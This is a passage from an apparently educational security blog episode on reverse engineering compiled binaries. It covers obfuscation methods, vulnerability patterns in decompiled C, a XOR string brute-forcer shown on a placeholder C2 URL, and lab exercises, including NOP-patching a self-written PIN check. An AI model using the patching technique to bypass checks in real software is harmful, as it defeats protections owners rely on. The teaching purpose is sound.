# - Control flow flattening: replaces structured if/else/loop with
#   a single giant switch statement in a while(1) loop. Every basic
#   block becomes a case in the switch. The decompiler still produces
#   output, but the original structure is gone and it is hard to follow.
#
# - Opaque predicates: conditions that always evaluate the same way
#   but look unpredictable to a disassembler.
#   Example: if ((x * (x + 1)) % 2 == 0)
#   Always true (the product of two consecutive integers is even),
#   but the disassembler sees a conditional branch and generates
#   two code paths (one of which is dead code).
#
# - Junk code insertion: NOPs, meaningless arithmetic, dead stores
#   that increase the size of functions without changing behavior.
#   Makes manual analysis tedious but doesn't fool smart analysis.
#
# - String encryption: hardcoded strings are XORed or AES-encrypted
#   in the binary and decrypted at runtime. Defeats strings analysis.
#   Dynamic analysis still works -- break at the decryption function
#   output and read the decrypted string from memory.
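For the simplest form of string encryption, a single-byte XOR, you do not even need the debugger: 255 keys is a small enough space to try them all and keep whatever decodes to something recognizable. A minimal sketch, assuming you have already carved the encrypted blob out of the binary; the known-plaintext needles are my own guesses at what a malware sample might contain.

```python
def xor_bytes(data, key):
    """XOR every byte of `data` with a single-byte key."""
    return bytes(byte ^ key for byte in data)


def brute_force_xor(blob, needles=(b"http://", b"https://", b"cmd.exe")):
    """Try every non-zero single-byte key.

    Returns {key: decoded_bytes} for each key whose output contains
    at least one of the known-plaintext needles.
    """
    results = {}
    for key in range(1, 256):
        decoded = xor_bytes(blob, key)
        if any(needle in decoded for needle in needles):
            results[key] = decoded
    return results


# Demo: "encrypt" one of the C2 URLs from the strings example with key 0x5A
plaintext = b"http://backup-c2.evil-domain.xyz/heartbeat"
encrypted = xor_bytes(plaintext, 0x5A)

for key, decoded in brute_force_xor(encrypted).items():
    print(hex(key), decoded)
```

Anything stronger (multi-byte keys, AES) is where the breakpoint-after-decryption approach described above becomes the practical route.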

Identifying Vulnerability Patterns in Disassembly

The real payoff of reverse engineering for security work is finding vulnerabilities in closed-source software. Here are the patterns to look for:

// Pattern 1: Dangerous function calls
// In Ghidra's decompiler, search for calls to:
//   strcpy, strcat, sprintf, gets, scanf without width specifier
// These are all buffer overflow candidates (just like episode 42)

// Ghidra decompiler output:
void process_input(char *param_1) {
    char local_108[256];
    sprintf(local_108, "User: %s logged in at %s", param_1, timestamp);
    // If param_1 is long enough, this overflows local_108
    // Fixed-size buffer + unbounded %s argument = vulnerability
}

// Pattern 2: Integer overflow leading to heap overflow
// Look for: malloc(user_controlled_size) or malloc(a * b)

void process_data(int count, int size) {
    // Ghidra decompiler shows:
    int total = count * size;           // integer overflow possible!
    char *buf = (char *)malloc(total);  // tiny allocation
    for (int i = 0; i < count; i++) {
        memcpy(buf + i * size, data[i], size);  // writes way past buf
    }
}
// If count = 0x10000 and size = 0x10000:
// total = 0x10000 * 0x10000 = 0x100000000, which truncates to 0 in 32 bits
// malloc(0) returns a minimum-size chunk (or NULL), memcpy writes 4GB into it

// Pattern 3: Use-after-free indicators
// Look for: free() followed by use of the same pointer
// In Ghidra: search for xrefs to free(), then check if the
// freed pointer is used after the free call

void handle_request(Request *req) {
    process(req);
    free(req);          // freed here
    log_access(req);    // USED HERE -- use-after-free!
}
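The arithmetic behind Pattern 2 is easy to check for yourself. Python integers never overflow, so the sketch below models the 32-bit truncation explicitly with a mask; it treats the multiplication as unsigned wraparound, which is how the overflow plays out on typical hardware even though signed overflow is formally undefined in C. The function names are mine.

```python
UINT32_MASK = 0xFFFFFFFF


def alloc_size_32(count, size):
    """Size that actually reaches malloc when count * size is computed in 32 bits."""
    return (count * size) & UINT32_MASK


def overflow_report(count, size):
    """Compare the intended allocation with the truncated one."""
    intended = count * size
    allocated = alloc_size_32(count, size)
    return {
        "intended": intended,
        "allocated": allocated,
        "overflows": allocated != intended,
    }


print(overflow_report(0x10000, 0x10000))
print(overflow_report(16, 32))
```

When auditing decompiler output, any `malloc(a * b)` where both factors are attacker-influenced and no range check precedes the multiplication deserves this calculation.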

The Reverse Engineering Workflow

Putting it all together, here's the workflow I use when analyzing an unknown binary (whether for vulnerability research or malware analysis):

1. File identification -- file binary, readelf -h binary (ELF), or load into PE-bear (Windows). What architecture? What OS? Statically or dynamically linked? Stripped?
2. Strings -- strings binary | grep -i interesting_pattern. Immediate high-value intelligence: URLs, passwords, error messages, file paths, API names.
3. Ghidra import and auto-analysis -- let Ghidra identify functions, cross-references, data types. This takes a few minutes for large binaries.
4. Navigate by strings -- find interesting strings in Ghidra's Defined Strings window, follow their xrefs to the code that uses them. This gets you to the interesting parts of the binary without reading it linearly.
5. Decompiler for understanding -- read the decompiled C pseudocode. Rename variables, retype parameters, add comments as you understand each function.
6. Dynamic verification -- when the decompiler output is ambiguous, run the binary in GDB with pwndbg. Set breakpoints at the functions you've identified, step through, examine register and memory state.
7. Vulnerability audit -- search for the dangerous function call patterns listed above. Every strcpy, sprintf, and unchecked malloc is a potential finding.

This workflow scales from simple crackmes (30 minutes) to complex firmware images (weeks of work). The tools change -- you might use Binary Ninja instead of Ghidra, or Frida instead of GDB for instrumentation on mobile platforms -- but the approach is constant: strings first, navigation by cross-reference, decompile for understanding, dynamic for verification.
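The file identification step can also be scripted when `file` and `readelf` are not at hand. The sketch below decodes only the handful of ELF header fields that answer "what architecture is this?"; the machine table is deliberately tiny and the function name is my own.

```python
import struct

# A few common e_machine values; many more exist
MACHINES = {3: "x86", 40: "ARM", 62: "x86-64", 183: "AArch64"}


def identify_elf(header):
    """Decode word size, byte order and machine from the start of a file.

    `header` must hold at least the first 20 bytes of the file.
    Returns None when the data does not look like an ELF header.
    """
    if len(header) < 20 or header[:4] != b"\x7fELF":
        return None
    bits = {1: 32, 2: 64}.get(header[4])               # EI_CLASS
    endian = {1: "little", 2: "big"}.get(header[5])    # EI_DATA
    if bits is None or endian is None:
        return None
    fmt = "<H" if endian == "little" else ">H"
    (machine,) = struct.unpack_from(fmt, header, 18)   # e_machine
    return {
        "bits": bits,
        "endian": endian,
        "machine": MACHINES.get(machine, f"unknown ({machine})"),
    }


# Hand-built header standing in for a real file: 64-bit, little-endian, x86-64
sample = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + struct.pack("<HH", 2, 62)
print(identify_elf(sample))
```

For a real binary, pass `open(path, "rb").read(20)`. A `None` result is your cue to check for a PE or Mach-O header instead.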

The AI Slop Connection

AI-powered decompilers are an active area of research and they are genuinely improving the reverse engineering workflow. Projects that use large language models to rename variables, suggest function purposes, and produce more readable decompiler output are making closed-source analysis faster. A function that Ghidra decompiles as FUN_00401230(local_48, iVar1) might become validate_user_input(username_buffer, max_length) with AI assistance -- a significant readability improvement.

Having said that, the same asymmetry we've seen throughout this series applies here. AI makes reverse engineering easier for defenders (better decompilation, faster analysis), but it also makes obfuscation generation easier for attackers (more sophisticated code transformations, automated anti-analysis techniques). AI-generated obfuscation that dynamically creates opaque predicates, randomizes control flow flattening patterns, and produces polymorphic string encryption -- all calibrated to defeat specific decompiler heuristics -- is something analysts should expect to encounter in advanced malware.

The practical takeaway: AI will not replace the reverse engineering skill. It will augment it. You still need to understand what mov rdi, rsi; call strcmp means. You still need to recognize vulnerability patterns in decompiled output. You still need to navigate a binary by cross-references and understand the architecture. The AI makes each of those steps faster, but it cannot do them for you -- because the judgment calls (is this a vulnerability or intentional behavior? is this obfuscation hiding something malicious or protecting legitimate IP?) require contextual understanding, and that is exactly what AI tools frequently get wrong when the context is adversarial.

What Comes Next

We've now covered the full exploitation lifecycle from start to finish: scanning and discovery (episodes 4-5), web application attacks (episodes 12-28), network exploitation (episodes 29-30), privilege escalation (episodes 31-32), lateral movement (episodes 33-34), infrastructure attacks (episodes 35-40), exploitation frameworks (episode 41), custom exploit development with mitigation bypasses (episodes 42-43), and now reverse engineering compiled binaries to find vulnerabilities without source code.

The next phase of the series shifts into a different domain entirely -- the supply chain, the human element, and the organizational dimensions of security. The techniques we've covered so far are all "how do you break into systems." The questions that come next are about the broader context: where do the vulnerabilities come from in the first place? How do attackers poison the tools and libraries that developers depend on? Why does security training consistently fail to change human behavior? What happens when the attack vector isn't a technical exploit but a compromised npm package or a manipulated employee? These are the questions that separate a vulnerability researcher from a complete security professional, and they build directly on everything we've done so far.

Exercises

Exercise 1: Download a crackme from https://crackmes.one (difficulty: easy, platform: Linux x86). Open it in Ghidra. Use the Defined Strings window to find strings like "Correct!", "Wrong!", or "Enter password:". Follow the cross-references from those strings to the validation function. Read the decompiler output and identify the expected input (hardcoded string comparison, arithmetic check, or hash). Solve the crackme without patching -- by understanding the algorithm and providing the correct input. Document: (a) the function structure in Ghidra's decompiler view, (b) the validation logic you identified, (c) the correct input. Save to `~/lab-notes/crackme-analysis.md`.

Exercise 2: Write a simple C program that checks a 4-digit PIN (`int pin = 7394;`, `if (atoi(input) == pin) { puts("Access granted"); }`). Compile it, then strip symbols (`strip binary`). Give the stripped binary to yourself after a coffee break. Reverse it in Ghidra: find the PIN without looking at the source code (hint: the integer constant is visible in the decompiler output or as an immediate operand in the disassembly). Then patch the binary so it accepts ANY PIN (NOP the conditional jump or patch the comparison). Document the patching process: which bytes changed and what instruction was modified. Then verify that the patch works. Save to `~/lab-notes/pin-reversal.md`.
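As a rough sketch of the patching step in Exercise 2, the snippet below works on a hand-written byte sequence rather than a real file. The bytes are illustrative only: they encode `cmp eax, 0x1ce2` followed by a short `jne`, which is one plausible shape for the PIN check, but your compiler may well emit a different comparison or jump. The helper `patch_bytes` is a made-up name; it refuses to patch unless the bytes at the offset are what you expect, which is a cheap guard against patching the wrong location.

```python
def patch_bytes(data: bytes, offset: int, expected: bytes, replacement: bytes) -> bytes:
    """Return a copy of data with `expected` at `offset` swapped for `replacement`."""
    if len(expected) != len(replacement):
        raise ValueError("patch must not change the size of the binary")
    if data[offset:offset + len(expected)] != expected:
        raise ValueError("bytes at offset do not match what we expected to patch")
    return data[:offset] + replacement + data[offset + len(expected):]


# Illustrative machine code (an assumption, not taken from a real build):
#   3d e2 1c 00 00    cmp eax, 0x1ce2
#   75 0c             jne +0x0c   (skips the "Access granted" branch)
code = bytes.fromhex("3de21c0000750c")

# The PIN sits in the instruction as a little-endian 32-bit immediate.
pin = int.from_bytes(code[1:5], "little")
print(pin)  # 7394

# Overwrite the two-byte jne with two one-byte NOPs (0x90) so execution always falls through.
patched = patch_bytes(code, 5, bytes.fromhex("750c"), b"\x90\x90")
print(patched.hex())  # 3de21c00009090
```

On a real binary the offset is a file offset, not the virtual address Ghidra shows, so you need to translate between the two before writing anything back to disk.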

Exercise 3: Take any binary you compiled in a previous exercise (from episodes 42 or 43) and pack it with UPX (`upx --best ./binary`). Open the packed version in Ghidra and document what you see -- compressed sections, no meaningful function names, the UPX stub code. Then unpack it (`upx -d ./binary`) and re-analyze in Ghidra. Compare the Ghidra output before and after unpacking (number of functions detected, decompiler readability, string visibility). Research one commercial packer (Themida or VMProtect) and write a brief summary of how it differs from UPX (code virtualization, multi-layer unpacking, anti-debug integration). Save your comparison to `~/lab-notes/packing-analysis.md`.
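If you want a number to go with the before/after comparison in Exercise 3, byte entropy is a common quick heuristic: compressed or encrypted data sits close to 8 bits per byte, while ordinary code and data is usually lower. This goes slightly beyond what the exercise asks for, so treat it as an optional extra. The function names below are made up for this sketch, and the `UPX!` marker check only works for unmodified UPX output (it is trivial to strip or alter).

```python
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy of the byte distribution, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    counts = Counter(data)
    return -sum((n / total) * math.log2(n / total) for n in counts.values())


def has_upx_marker(data: bytes) -> bool:
    """True if the stock UPX magic bytes appear anywhere in the data."""
    return b"UPX!" in data


# Tiny in-memory examples; a real comparison would read the packed and unpacked files.
print(shannon_entropy(b"AAAAAAAA"))        # one repeated byte: no information
print(shannon_entropy(bytes(range(256))))  # every byte value once: the maximum
print(has_upx_marker(b"\x00\x00UPX!\x0d\x0c"))
```

Running both functions over the packed and the unpacked file, and noting the two entropy values next to the Ghidra function counts, gives you one more column for the comparison in your lab notes.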

Cheers!

@scipio


